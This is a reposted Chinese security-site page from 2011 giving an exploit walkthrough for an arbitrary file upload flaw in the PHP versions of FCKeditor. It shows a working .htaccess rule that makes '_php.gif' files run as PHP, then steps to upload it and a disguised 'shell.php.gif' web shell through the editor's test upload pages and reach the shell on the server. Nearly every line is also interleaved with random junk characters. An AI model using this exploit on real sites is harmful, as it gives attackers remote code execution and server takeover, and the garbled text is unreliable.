FCKeditor所有php版本Upload上传漏洞/ {0 Q9 t4 E; p$ u2 D9 m3 O- t- y
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
8 k% Y: P) u! N& a a减小字体 增大字体1 @ w ?3 m H3 b) j" [ o
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
2 X5 ?: `1 m+ e) ^- A* m. w[+] Date: 2011
% |( F% G5 {( ]$ U2 j[+] Author : sinesafe.cn
1 U+ u6 a- u8 T, L[+] Website : WwW.sinesafe.cn( Q; {4 {5 E& e* Z [
———————————————————/ B0 e; z- _% w, V. l4 M
1.create a htaccess file:
6 I+ B3 F5 I: Jcode:0 N7 V6 s" M& Z0 H) }. k
<FilesMatch “_php.gif”>
& _* P* J. I6 p2 u; e |+ ESetHandler application/x-httpd-php9 x' c5 L; s: T/ o6 W/ O3 R
</FilesMatch>* h) u( c+ `2 _
+ e" C- v7 j* z
2.Now upload this htaccess with FCKeditor.
/ J4 i1 Z8 O/ c) R+ Z1 D
& j) \# Z( `9 r% h9 u1 ghttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html$ D; ]' a3 Y; K( t3 }1 ?
# U( p9 _. S; I% G; f
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html c) p1 z9 u, k0 V
" [ m. q6 P$ d5 G
———————————————————————————————-5 t. E9 N# j: L! }+ g
3.Now upload shell.php.gif with FCKeditor.1 L& v! s$ x" ?7 M
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.& c8 x6 E4 L0 p2 Y1 t
5.http://www.sinesafe.cn/anything/shell_php.gif9 i. ?: n: k- }1 R8 S
6.Now shell is available from server. |
. L5 x3 P& H9 d4 x4 h$ z4 S V- ]7 S2 M
5 J" \4 D6 G4 S! N |